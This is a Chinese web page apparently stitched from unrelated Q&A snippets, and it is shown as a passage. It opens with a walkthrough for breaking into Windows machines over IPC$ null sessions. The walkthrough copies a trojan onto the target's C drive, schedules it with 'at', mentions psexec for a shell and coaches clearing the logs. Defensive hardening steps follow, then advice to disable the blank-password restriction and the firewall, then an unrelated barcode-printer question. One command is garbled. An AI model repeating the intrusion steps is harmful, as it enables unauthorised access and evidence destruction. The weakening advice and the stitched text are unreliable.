8 好了,現在我們來走另一條路,給它傳個木馬玩玩
9 首先,我們先建立起ipc$連接
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator
10 既然要上傳東西,就要先知道它開了什麼共享
C:\>net view \\192.168.21.*
在 \\192.168.21.*的共享資源
資源共享名 類型 用途 注釋
-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了,我們看到對方共享了C,D兩個盤,我們下面就可以向任意一個盤復制文件了。再次聲明,因為用net view命令無法看到默認共享,因此通過上面返回的結果,我們並不能判斷對方是否開啟了默認共享。
11 C:\> love.exe \\192.168.21.*\c
已復制 1 個文件
*用這個命令你可以將木馬客戶端love.exe傳到對方的c盤下,當然,如果能復制到系統文件夾下是最好的了,不容易被發現
12 運行木馬前,我們先看看它現在的時間
net time \\192.168.21.*
\\192.168.21.*的當前時間是 2003/8/22 上午 11:00
命令成功完成
13 現在我們用at運行它吧,不過對方一定要開了Task Scheler服務(允許程序在指定時間運行),否則就不行了
C:\>at \\192.168.21.* 11:02 c:\love.exe
新加了一項作業,其作業 ID = 1
14 剩下就是等了,等過了11:02,你就可以用控制端去連接了,如果成功你將可以用圖形界面去控制遠程主機了,如果連接失敗,那麼它可能在區域網里,也可能程序被防火牆殺了,還可能它下線了(沒這么巧吧),無論哪種情況你只好放棄了
嗯,好了,兩種基本方法都講了。如果你對上面的操作已經輕車熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec執行木馬,用命令:psexec \\tergetIP -u user -p paswd cmd.exe直接獲得shell等,這些都是可以得,隨你的便。不過最後不要忘了把日誌清理干凈,可以用榕哥的elsave.exe。
講了ipc$的入侵,就不能不說如何防範,那麼具體要怎樣做呢?看下面
十三 如何防範ipc$入侵
1 禁止空連接進行枚舉(此操作並不能阻止空連接的建立)
方法1:
運行regedit,找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:1
如果設置為"1",一個匿名用戶仍然可以連接到IPC$共享,但限制通過這種連接得到列舉SAM帳號和共享等信息;在Windows 2000 中增加了"2",限制所有匿名訪問除非特別授權,如果設置為2的話,可能會有一些其他問題發生,建議設置為1。如果上面所說的主鍵不存在,就新建一個再改鍵值。
方法2:
在本地安全設置-本地策略-安全選項-在'對匿名連接的額外限制'中做相應設置
2 禁止默認共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(重起後默認共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
3)停止server服務
net stop server /y (重新啟動後server服務會重新開啟)
4)禁止自動打開默認共享(此操作並未關閉ipc$共享)
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙位元組值)一個主健再改鍵值。
這兩個鍵值在默認情況下在主機上是不存在的,需要自己手動添加。
3 關閉ipc$和默認共享依賴的服務:server服務
控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-選已禁用
這時可能會有提示說:XXX服務也會關閉是否繼續,因為還有些次要的服務要依賴於lanmanserver,不要管它。
4 屏蔽139,445埠
由於沒有以上兩個埠的支持,是無法建立ipc$的,因此屏蔽139,445埠同樣可以阻止ipc$入侵。
1)139埠可以通過禁止NBT來屏蔽
本地連接-TCP/IT屬性-高級-WINS-選『禁用TCP/IT上的NETBIOS』一項
2)445埠可以通過修改注冊表來屏蔽
添加一個鍵值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完後重啟機器
注意:如果屏蔽掉了以上兩個埠,你將無法用ipc$入侵別人。
3)安裝防火牆進行埠過濾
5 設置復雜密碼,防止通過ipc$窮舉出密碼。
『柒』 windows server 2003 伺服器系統問題 共享不見了
情況1:進入工作組提示輸入密碼
更改網路訪問模式 administrator
打開組策略編輯器,依次選擇「計算機配置→Windows設置→安全設置→本地策略→安全選項」,雙擊「網路訪問:本地賬號的共享和安全模式」策略,將默認設置「僅來賓—本地用戶以來賓身份驗證」,更改為「經典:本地用戶以自己的身份驗證」。
現在,當其他用戶通過網路訪問使用Windows XP的計算機時,就可以用自己的「身份」進行登錄了(前提是Windows 2003中已有這個賬號並且口令是正確的)。
當該策略改變後,文件的共享方式也有所變化,在啟用「經典:本地用戶以自己的身份驗證」方式後,我們可以對同時訪問共享文件的用戶數量進行限制,並能針對不同用戶設置不同的訪問許可權。
不過我們可能還會遇到另外一個問題,當用戶的口令為空時,訪問還是會被拒絕。原來在「安全選項」中有一個「賬戶:使用空白密碼的本地賬戶只允許進行控制台登錄」策略默認是啟用的,根據Windows 2003安全策略中拒絕優先的原則,密碼為空的用戶通過網路訪問使用Windows 2003的計算機時便會被禁止。我們只要將這個策略停用即可解決問題。
情況2:工作組進入不了、那就查看一下共享服務開了沒。
控制面板-管理工具-服務--查找server服務,將它設為開啟。
如果 還不行那就把防火牆給關了。
這樣大概也就行了!!希望對你有用!
『捌』 條碼列印機怎麼使用啊
一、設置頁面
根據標簽的大小來設置要列印的頁面格式,具體操作步驟見以下圖片藍色方框處:如圖所示: